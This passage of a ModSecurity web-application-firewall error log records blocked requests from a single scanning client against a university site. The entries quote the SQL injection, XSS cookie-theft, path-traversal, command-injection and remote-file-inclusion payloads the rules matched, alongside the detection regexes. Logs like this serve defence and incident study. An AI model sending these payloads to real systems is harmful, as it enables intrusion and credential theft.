"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAXbcOYAAAAL"]
[Tue Aug 29 11:40:46.412175 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAcYU44AAAAp"]
[Tue Aug 29 11:40:50.360752 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAcoNNQAAAAF"]
[Tue Aug 29 11:40:50.408634 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAcqJEwAAAAG"]
[Tue Aug 29 11:40:53.656293 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbEkAAAAH"]
[Tue Aug 29 11:40:55.431428 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAcPi0gAAAAa"]
[Tue Aug 29 11:40:58.355817 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAcvBb8AAAAJ"]
[Tue Aug 29 11:40:58.423727 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAYMWTAAAAAR"]
[Tue Aug 29 11:40:59.358990 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO1228Co-f0AAAaZ9lIAAAAo"]
[Tue Aug 29 11:40:59.375502 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gopmsio7rtrnzp.oast.site found within TX:1: cjmnbitjmimt14dgn26gopmsio7rtrnzp.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcvBcYAAAAJ"]
[Tue Aug 29 11:41:00.386978 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAcvBcsAAAAJ"]
[Tue Aug 29 11:41:00.389524 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO123MCo-f0AAAcbSBsAAAAv"]
[Tue Aug 29 11:41:00.419725 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAaZ9lkAAAAo"]
[Tue Aug 29 11:41:00.439815 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAaZ9loAAAAo"]
[Tue Aug 29 11:41:01.472694 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAaZ9lwAAAAo"]
[Tue Aug 29 11:41:01.550234 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAcvBdEAAAAJ"]
[Tue Aug 29 11:41:01.643244 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAAcbSCUAAAAv"]
[Tue Aug 29 11:41:03.595403 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAaZ9mkAAAAo"]
[Tue Aug 29 11:41:03.644283 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAcvBeEAAAAJ"]
[Tue Aug 29 11:41:04.365079 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "mbkm.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAaZ9mwAAAAo"]
[Tue Aug 29 11:41:04.435226 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAAYMWUsAAAAR"]
[Tue Aug 29 11:41:05.361138 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAYMWU8AAAAR"]
[Tue Aug 29 11:41:05.375814 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAcvBeoAAAAJ"]
[Tue Aug 29 11:41:05.535122 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAYMWVcAAAAR"]
[Tue Aug 29 11:41:05.571564 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "mbkm.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAYf-NoAAAAD"]
[Tue Aug 29 11:41:08.459799 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAcoNRAAAAAF"]
[Tue Aug 29 11:41:09.308246 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAc2dOEAAAAN"]
[Tue Aug 29 11:41:09.670441 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAc36s0AAAAO"]
[Tue Aug 29 11:41:10.443433 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAc4EjYAAAAP"]
[Tue Aug 29 11:41:10.507663 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAaZ9ngAAAAo"]
